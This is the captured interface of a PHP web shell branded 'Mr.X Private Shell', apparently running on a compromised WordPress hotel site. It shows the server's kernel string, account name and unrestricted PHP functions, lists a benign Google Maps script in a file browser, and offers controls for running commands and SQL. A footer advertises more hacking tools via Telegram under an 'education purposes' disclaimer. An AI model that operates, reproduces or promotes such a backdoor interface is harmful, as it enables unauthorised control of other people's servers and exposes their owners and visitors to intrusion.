Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www///old/wp-content/themes/B&B Villa Dalegno/js      ( Reset | Go to )
File Name: gmap.js
Edit
var map = null;

var gmap_styles = [];
if (gmap_options.hide_businesses == 1) {
    gmap_styles = [{ featureType: 'poi.business', stylers: [{ visibility: 'off' }] }];
}

function initialize(Lat,Lng) {
    var latlng = new google.maps.LatLng(Lat,Lng);
    var myOptions = {
        zoom: 15,
        center: latlng,
        mapTypeId: google.maps.MapTypeId.ROADMAP,
        mapTypeControl: true,
        mapTypeControlOptions: {
            style: google.maps.MapTypeControlStyle.DROPDOWN_MENU
        },
        styles: gmap_styles
    };

    map = new google.maps.Map(document.getElementById("map-canvas"),myOptions);
    var contentString = googlemapMarker;
    var infowindow = new google.maps.InfoWindow({
        content: contentString
    });

    var marker = new google.maps.Marker({
        position: latlng, 
        map: map
    });

    google.maps.event.addListener(marker, 'click', function() {
        infowindow.open(map,marker);
    });

}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL